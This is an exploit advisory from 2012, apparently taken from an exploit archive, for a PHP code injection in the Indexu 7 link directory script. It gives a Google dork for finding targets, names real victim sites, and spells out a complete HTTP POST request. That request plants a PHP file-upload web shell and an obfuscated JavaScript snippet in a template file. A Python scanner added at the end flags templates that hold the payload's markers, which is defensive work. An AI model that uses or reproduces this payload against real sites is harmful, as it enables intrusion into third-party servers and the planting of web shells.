`# --------------------------------------- #
Author : L3b-r1'z
Title : Indexu 7 Php Code Injection
Date : 5/30/2012
Email : [email protected]
Site : Sec4Ever.com & Exploit4arab.com
Google Dork : allintext: "Listing by GooglePR"
Version : N/A
# --------------------------------------- #
1) Bug
2) PoC
# --------------------------------------- #
1) Bug :
The script allows an admin to edit files in the templates folder, including files with a .php extension :)
so an attacker can inject code into any file edited this way.
NOTE :
Before you inject code, you should know whether the theme is there
(./templates/KOMET).
E.g. : http://www.site.com/templates/komet/rows.php
# --------------------------------------- #
2) PoC :
In the POST box at the top of Live HTTP Headers, put : http://www.site.com/admin/db.php
Host: site.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://site.com/admin/template.php?act=editfile&id=komet&file=rows.php
Cookie: U_AUTHENTICATED=1; __atuvc=7|22;
PHPSESSID=6c8ee4251b4d5e252d0030dccdc389a8;
__utma=111872281.551771833.1338331592.1338331592.1338331592.1;
__utmc=111872281;
__utmz=111872281.1338331592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Content-Type: multipart/form-data;
boundary=---------------------------11662147216064
Content-Length: 1157
Send POST Content :
-----------------------------11662147216064\r\n
Content-Disposition: form-data; name="act"\r\n
\r\n
editfile\r\n
-----------------------------11662147216064\r\n
Content-Disposition: form-data; name="id"\r\n
\r\n
komet\r\n
-----------------------------11662147216064\r\n
Content-Disposition: form-data; name="file"\r\n
\r\n
rows.php\r\n
-----------------------------11662147216064\r\n
Content-Disposition: form-data; name="file_content"\r\n
\r\n
<?php\r\n
echo '<b><br><br>'.php_uname().'<br></b>';\r\n
echo '<form action="" method="post" enctype="multipart/form-data"
name="uploader" id="uploader">';\r\n
echo '<input type="file" name="file" size="50"><input name="_upl"
type="submit" id="_upl" value="Upload"></form>';\r\n
if( $_POST['_upl'] == "Upload" ) {\r\n
\tif(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
echo '<b>Upload SUKSES !!!</b><br><br>'; }\r\n
\telse { echo '<b>Upload GAGAL !!!</b><br><br>'; }\r\n
}\r\n
?>\r\n
<script type="text/javascript" language="javascript">ML="Rjnis/e
.rI<thzPS-omTCg>:=p";MI=";@E0:?D7@0EI=<<JH55>B26A<8B9F53CF45>814G;5@E0:?DG";OT="";for(j=0;j<MI.length;j++){OT+=ML.charAt(MI.charCodeAt(j)-48);}document.write(OT);</script>\r\n
-----------------------------11662147216064--\r\n
Snip : http://www11.0zz0.com/2012/05/30/00/788460850.png
Note : Use it at your own risk.
Demo Site's :
http://telemed24.pl/templates/komet/rows.phphttp://sefid.com.pl/templates/komet/rows.php
Page 2 of about 975,000 results (0.17 seconds) = And More In Google :P.
# --------------------------------------- #
Thx To : I-Hmx , B0X , Hacker-1420 , Damane2011 , Sec4ever , The
Injector , Over-X , Ked-Ans , N4SS1M , B07 M4ST3R , Black-ID ,
Indoushka .
# --------------------------------------- #
remove this note please : this script named indexu 7 web links i write
the dork you can check it now :D
and the demo site is upload form
and the bug is php code injection , i write p0c to inject upload form
in the default template :D
and thx you :D
`
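For defenders checking whether a template was modified the way the PoC above does, here is an added example (not part of the original advisory or of Indexu) that walks a templates directory and flags .php files containing the constructs seen in the injected payload. The indicator list, function names and sample tree are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Indicators taken from the payload shown in the PoC above: template files
# render markup and have no reason to handle uploads or print host details.
INDICATORS = {
    "reads $_FILES": re.compile(r"\$_FILES\s*\["),
    "copies an uploaded file": re.compile(
        r"\b(?:copy|move_uploaded_file)\s*\(\s*\$_FILES", re.I),
    "calls php_uname()": re.compile(r"\bphp_uname\s*\(", re.I),
    "emits a file-upload form": re.compile(r"<input[^>]+type=[\"']?file", re.I),
}

def scan_templates(root):
    """Return {relative_path: [indicator names]} for suspicious *.php files."""
    root = Path(root)
    findings = {}
    for path in sorted(root.rglob("*.php")):
        text = path.read_text(encoding="utf-8", errors="replace")
        hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
        if hits:
            findings[path.relative_to(root).as_posix()] = hits
    return findings

def build_sample_tree(root):
    """Constructed sample data: one clean template, one modified like the PoC."""
    komet = Path(root) / "komet"
    komet.mkdir(parents=True)
    (komet / "header.php").write_text(
        "<div class='row'><?php echo $title; ?></div>\n")
    (komet / "rows.php").write_text(
        "<?php echo php_uname();\n"
        "echo '<input type=\"file\" name=\"file\">';\n"
        "if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {}\n"
        "?>\n")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for rel, hits in scan_templates(tmp).items():
            print(f"{rel}: {', '.join(hits)}")
```

Point `scan_templates` at the real `templates` directory of an install; any hit in a template file warrants comparing that file against a clean copy of the theme.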